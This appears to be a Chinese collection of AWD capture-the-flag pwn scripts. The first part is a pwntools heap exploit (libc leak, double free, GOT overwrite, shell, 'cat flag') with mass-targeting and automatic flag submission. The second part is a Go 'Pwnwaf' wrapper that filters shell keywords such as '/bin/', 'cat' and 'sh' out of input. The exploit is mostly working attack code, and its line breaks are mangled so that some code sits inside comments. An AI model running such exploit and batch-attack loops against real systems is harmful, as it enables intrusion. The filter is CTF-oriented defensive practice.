AWD-Pwn脚本汇总

filename = 'url.txt'
with open(filename,'w') as f:
    for i in range(255):
        url="127.0."+str(i)+".1:9999\n"
        f.write(url)

#攻击函数，可以自定义
def pwn(host,port):
    context(os="linux",arch="amd64",timeout=30)
    # context.log_level="DEBUG"     p=remote(host,port)

    context.terminal = ['tmux', 'split', '-h']
    elf=ELF("./main")
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # gdb.attach(p,"b *0x400bd0")     newpost(p,"AAAAAA")#0     newpost(p,"BBBBBBB")#1     unsort(p,"6666666") #2     newpost(p,"hhhhh") #3 0x6020b8     #pause()     delete(p,"2")
    newpost(p,"")

    show(p)
    libc.address=u64(p.recvuntil("\x7f",timeout=3)[-6: ] + '\0\0')-  250-0x3c4b10
    success("libc -> {:#x}".format(libc.address))

    delete(p,"0")
    delete(p,"1")
    delete(p,"0")
    # pause()     newpost(p,p64(0x60208d))
    # pause() 
    newpost(p,"/bin/sh\0")
    #pause()     newpost(p,"")
    ioaddr=0x7f55aab438e0-0x7f55aa77f000
    ####test # newpost(p,"") # pause()     ####test     newpost(p,'qrstuvwxyz'+"ABCDEFGHIJKLMNOPQ"+p64(0x602018))

    p.sendlineafter("Your Choice:","2")
    p.sendlineafter("Enter the Index:","3")
    content=p64(libc.address+283536)[:-1]
    p.sendafter("Enter the Content:",content)


    #edit("4","/bin/sh")     #pause()     delete(p,"6")
    p.sendline("cat flag")
    flag=p.recvline()
    p.close()##！！！！！！！！！！！！！！！！！！！！！重要     return flag
    #################这些都不重要################################################### def newpost(p,content):
    p.sendlineafter("Your Choice:","1")
    p.sendlineafter("Enter the Content:",content)
    p.recvline()

def edit(p,index,content):
    p.sendlineafter("Your Choice:","2")
    p.sendlineafter("Enter the Index:",index)
    p.sendlineafter("Enter the Content:",content)

def delete(p,index):
    p.sendlineafter("Your Choice:","3")
    p.sendlineafter("Enter the Index:",index)

def show(p):
    p.sendlineafter("Your Choice:","4")

def unsort(p,content):
    p.sendlineafter("Your Choice:","5")
    p.sendlineafter("Enter the Content:",content)

#自动提交flag
def submit(flag, token):
    url = "xxxx"
    pos = {
        "flag":flag,
        "token":token
    }

    print "[+] Submiting flag : [%s]" % (pos)
    response = requests.post(url,data=data)
    content = response.content
    print "[+] Content : %s " % (content)
    if failed in content:
        print "[-]failed"
        return False
    else:
        print "[+] Success!"
        return True

def exploit(host,port):
	try:
		#pwn是攻击函数
		flag = pwn(host,port)
		#提交flag的submit函数
		submit(flag,token)

	except Exception as m:
		print(m)

def exploit_it():
	#打开目标
	with open("url.txt") as f :
		for line in f:
			#分割ip和端口
			host = line.split(":")[0]
			port = int(line.split(":")[1])
			print("[+] Exploiting:%s:%d" % (host,port))
			#执行攻击脚本
			exploit(host,port)

package main

import (
    "bufio"
    "fmt"
    "os"
    "os/exec"
    "regexp"
    "strconv"
    "sync"
    "time"
)

//他大概的功能是匹配关键命令，替换为空，匹配flag文件，返回空内容。并将过程写入日志
var wg sync.WaitGroup

const (
    pwnPath = "./tmp/nysec"  //替换为要保护的pwn
    logPath = "./tmp/pwnone_log/"  //替换为可读可写的 日志目录
)

func main() {
    fmt.Println("该文件由Pwnwaf进行保护")
    _,err := os.Stat(logPath) //判断./tmp/nysec是否存在
    if err != nil { 
        //os.Mkdir(logPath, 0777) //如果文件夹不存在则创建文件夹
        os.MkdirAll(logPath,0777)
    }
    logfileName := time.Now().Format("15_04_05") + "_" + strconv.FormatInt(time.Now().UnixNano() / 1e6,10) + ".log"
    //time.Now().Format("15_04_05")获取当前时间格式化当前时间
    //strconv.FormatInt(time.Now().UnixNano() / 1e6,10)：相当于随机数，这个数随着时间的推移而增大
    logfileName = logPath + logfileName
    f,err := os.OpenFile(logfileName,os.O_CREATE|os.O_WRONLY, os.ModePerm)
    //创建为logfileName的文件
    //os.O_CREATE|os.O_WRONLY：如果文件已存在，则会覆盖写，不会清空原来的文件，而是直接从头开始覆盖
    fwriter := bufio.NewWriter(f) //创建默认大小的缓冲区
    defer func() { //匿名函数最后执行
        fwriter.Flush() //将缓冲区文件写入到文件中
        f.Close()
    }()

    pwnCmd := exec.Command(pwnPath) //运行nysec文件，即运行pwn文件
    pwnIn,_ := pwnCmd.StdinPipe() //标准输入重定向到PwnIn
    pwnOut,_ := pwnCmd.StdoutPipe()//标准输出重定向到PwnOut
    pwnCmd.Start() //立即执行pwn文件
    wg.Add(1) 
    //一个 WaitGroup 对象可以等待一组协程结束
    //wg.Add(int) 设置协程的个数，然后创建worker协程
    go func() { //创建协程--output
        dangerExp := regexp.MustCompile("flag\\{.*?}") //正则匹配
        for {
            output := make([]byte,1024) //创建切片
            length,err := pwnOut.Read(output)  //将pwnOut读入到output中
            if err != nil{
                wg.Done() //协程结束后都要调用 wg.Done()；
                return
            }
            output = output[:length] //从第一个元素开始到output
            fwriter.WriteString("send: \n")
            fwriter.Write(output)
            fwriter.WriteString("\n")
            fmt.Print(string(dangerExp.ReplaceAll(output,[]byte{}))) //将output中的某些特殊字符正则匹配为空
        }
    }()
    go func() {//input
        //创建正则表达式，匹配输入是否包含以下指令
        dangerExp := regexp.MustCompile("/bin/|cat|flag|sh|tac|strings|head|tail|base64")
        for {

            input := make([]byte,1024)
            length,err := os.Stdin.Read(input) 	//读取输入
            if err != nil{
                wg.Done()
                return
            }
            input = input[:length]
            //将获取的输入写入文件
            fwriter.WriteString("receive: \n")
            fwriter.Write(input)
            fwriter.WriteString("\n")
            //使用空白，替换 危险的关键字，使用正则表达式
            input = dangerExp.ReplaceAll(input,[]byte{})
            //替换后的输入，写入pwnIn
            _, err = pwnIn.Write(input)
            if err != nil {
                wg.Done() //协程结束后都要调用 wg.Done()；
                return
            }
        }
    }()
    wg.Wait() //main协程调用 wg.Wait() 阻塞等待所有协程执行完毕后返回
}